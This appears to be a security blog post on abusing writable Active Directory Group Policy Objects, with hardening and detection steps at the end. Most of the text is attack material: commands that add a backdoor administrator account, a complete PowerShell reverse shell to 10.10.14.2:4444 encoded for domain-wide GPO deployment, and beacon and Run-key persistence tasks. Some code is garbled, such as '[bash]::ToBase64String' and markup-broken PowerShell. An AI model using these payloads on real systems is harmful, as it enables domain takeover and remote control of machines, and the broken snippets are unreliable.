Listen to this Post

Introduction:
Group Policy Objects (GPOs) are the backbone of centralized configuration management in Active Directory (AD), controlling everything from security settings to software deployment. However, when misconfigured, writable GPOs become a prime attack vector, allowing adversaries to escalate privileges to Domain Admin, deploy ransomware domain-wide, or establish persistent backdoors. This article dissects the GPO abuse technique—used by red teams and real attackers alike—and provides hands-on commands for both exploitation and defense.
Learning Objectives:
- Identify writable GPOs using BloodHound and SharpHound collection.
- Abuse vulnerable GPOs with SharpGPOAbuse and pyGPOAbuse to gain SYSTEM-level command execution.
- Implement detection and hardening measures to prevent GPO-based domain takeovers.
You Should Know:
1. Identifying Writable GPOs with BloodHound
BloodHound maps attack paths in AD. To find GPOs that a controlled user can modify, we first collect data using SharpHound (Windows) or BloodHound.py (Linux).
Step‑by‑step guide (Windows):
- Download SharpHound from the BloodHound GitHub repository.
- Run as non‑admin:
.\SharpHound.exe -c All --outputdirectory C:\BH
- Import the resulting zip file into BloodHound (neo4j + bloodhound GUI).
- In BloodHound, run the custom query:
MATCH (u:User {name: 'DOMAIN\youruser'})-[:WriteGpo]->(g:GPO) RETURN u.name, g.name - Alternatively, use the built‑in edge “WriteGPO” from a user node.
Step‑by‑step guide (Linux):
Install bloodhound.py pip install bloodhound Collect data (requires domain credentials) bloodhound-python -d lab.local -u low_user -p Pass123 -ns 192.168.1.10 -c all
Upload the JSON files to BloodHound. Look for “FirstDegreeGPOAbuse” edges.
Why this matters: Attackers prioritize GPOs linked to high‑impact OUs (e.g., Domain Controllers, Servers). A single writable GPO can push malicious configurations to thousands of machines.
2. Abusing GPO with SharpGPOAbuse
SharpGPOAbuse is a C tool that modifies existing GPOs to add a user to the local Administrators group, create scheduled tasks, or run arbitrary commands.
Step‑by‑step guide:
- Compile SharpGPOAbuse (or download a pre‑compiled binary).
- Run from a Windows machine as a user who has WriteGpo rights on a target GPO:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount victimuser --GPOName "Vulnerable GPO"
- Force immediate update on a target machine:
Invoke-GPUpdate -TargetComputer "TARGET-PC" -Force
- Alternatively, add a scheduled task that runs every hour:
SharpGPOAbuse.exe --AddScheduledTask --TaskName "UpdateChecker" --Command "C:\Windows\System32\calc.exe" --GPOName "Vulnerable GPO"
For Linux attackers using pyGPOAbuse:
Clone and run git clone https://github.com/ShellWrecker/pyGPOAbuse cd pyGPOAbuse python3 pygpoabuse.py -u low_user -p Pass123 -d lab.local --gpo-name "Vulnerable GPO" --command "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
This tool talks directly to LDAP and SMB, no Windows binary required.
3. Deploying Malicious Payloads via GPO
Once you control a GPO, you can force domain‑wide execution of any script. Common payloads reverse shells, Mimikatz, or Cobalt Strike beacons.
Step‑by‑step guide using native Windows tools (no third‑party binaries):
– Open `Group Policy Management Console` (GPMC).
– Right‑click the vulnerable GPO → Edit.
– Navigate to Computer Configuration → Preferences → Control Panel Settings → Scheduled Tasks.
– Create a new Scheduled Task (immediate, run as SYSTEM).
– Action: Start a program → `cmd.exe` with arguments /c powershell -enc <Base64 reverse shell>.
– Alternatively, modify `Computer Configuration → Windows Settings → Scripts → Startup` to run a malicious script from an SMB share.
Command to encode a PowerShell reverse shell:
$Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$Encoded = [bash]::ToBase64String($Bytes)
Write-Output $Encoded
Push the encoded command via GPO scheduled task. On the next refresh (up to 90 minutes, or use gpupdate /force), all computers in the linked OU get shells.
4. Persistence via Scheduled Tasks
Attackers often use GPO to plant persistent scheduled tasks that survive reboots and reimages.
Step‑by‑step with SharpGPOAbuse:
Every hour, run a beacon SharpGPOAbuse.exe --AddScheduledTask --TaskName "WindowsUpdateService" --Command "C:\tools\beacon.exe" --Arguments "--server 10.10.14.2" --GPOName "Vulnerable GPO"
Manual method via GPMC (defender perspective):
- In GPO Editor, go to
Computer Configuration → Preferences → Control Panel Settings → Scheduled Tasks. - New → Scheduled Task (Windows 10+).
- Set trigger: `At startup` and
Repeat every 5 minutes indefinitely. - Action: Run `%windir%\System32\reg.exe` add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d “C:\payload.exe”
- Apply to the GPO and link to high‑value OUs.
Detection note: Monitor Event ID 4698 (scheduled task created) and 5136 (GPO modification) in the domain controller’s security log.
5. Mitigation Strategies: Locking Down GPOs
Prevent GPO abuse by applying least privilege and auditing.
Step‑by‑step hardening:
- Find all users/groups with WriteGPO permissions:
As Domain Admin, using PowerShell ActiveDirectory module Get-ADObject -LDAPFilter "(&(objectClass=groupPolicyContainer)(!(name={})))" | ForEach-Object { $acl = Get-ADObject -Identity $<em>.DistinguishedName -Properties nTSecurityDescriptor $acl.nTSecurityDescriptor.Access | Where-Object { $</em>.ActiveDirectoryRights -match "WriteProperty" } } - Remove WriteGPO from all non‑administrators:
Set-GPPermission -Name "Default Domain Policy" -TargetName "Domain Users" -PermissionLevel None
- Enable advanced audit policies:
- GPO → Computer Config → Policies → Windows Settings → Security Settings → Advanced Audit Policy → Audit GPO Changes (Success and Failure).
- Deploy PowerShell logging and Script Block logging to capture `SharpGPOAbuse` or `pyGPOAbuse` usage.
Linux command to detect misconfigurations from a management host:
Using ldapsearch to list GPOs with owner attribute ldapsearch -H ldap://dc.lab.local -D "cn=readonly,dc=lab,dc=local" -w pass -b "dc=lab,dc=local" "(&(objectClass=groupPolicyContainer))" cn nTSecurityDescriptor
6. Detection and Incident Response
Rapidly respond to GPO abuse with these forensic commands.
Step‑by‑step detection:
- Check for newly added scheduled tasks across domain:
Get-WinEvent -ComputerName DC1 -FilterHashtable @{LogName='Security';ID=4698} | Where-Object {$_.Message -like "GPO"} - Find GPOs modified in the last 24 hours:
Get-GPO -All | Where-Object { $_.ModificationTime -gt (Get-Date).AddDays(-1) } - Query registry for GPO script assignments:
reg query "\TARGET-PC\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts" /s
- Linux alternative using enum4linux:
enum4linux -G -S 192.168.1.10 | grep -i "gpo"
- Disable a malicious GPO immediately:
Set-GPLink -Name "Malicious GPO" -Target "OU=Workstations,DC=lab,DC=local" -Enforced No Get-GPO -Name "Malicious GPO" | Set-GPRegistryValue -Key "HKLM\Software\Policies\Microsoft\Windows\System" -ValueName "DisableCMD" -Type DWord -Value 1
This turns the attacker’s own weapon against them by disabling command execution via the compromised GPO.
What Undercode Say:
- Attackers don’t need zero‑days: GPO abuse relies on misconfigured delegation—a common issue in many enterprises. BloodHound reveals these paths in minutes.
- Defense is not just about patching: Hardening AD means strict ACLs on GPOs, monitoring Event ID 5136, and using tools like ADACLScanner or PingCastle to pre‑emptively find writable GPOs.
Analysis: While many red team articles stop at adding a local admin, real adversaries use GPO abuse to deploy ransomware, credential harvesters, or even alter Windows Defender exclusions domain‑wide. The technique is especially dangerous because GPO changes blend into normal administrative activity. Detection requires baseline knowledge of legitimate GPO edit activity; otherwise, a single modified policy can compromise an entire forest.
Prediction:
As Microsoft pushes more security defaults (like the upcoming “GPO Audit Mode”) and as organizations migrate partially to Intune, attackers will shift to hybrid GPO/Intune abuse. Expect to see cross‑cloud persistence where a compromised on‑prem GPO writes a malicious configuration into Entra ID (Azure AD) synchronization settings. Defenders will need unified policy monitoring across both environments—something most blue teams are not yet equipped to handle.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Anubhav Sharma – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


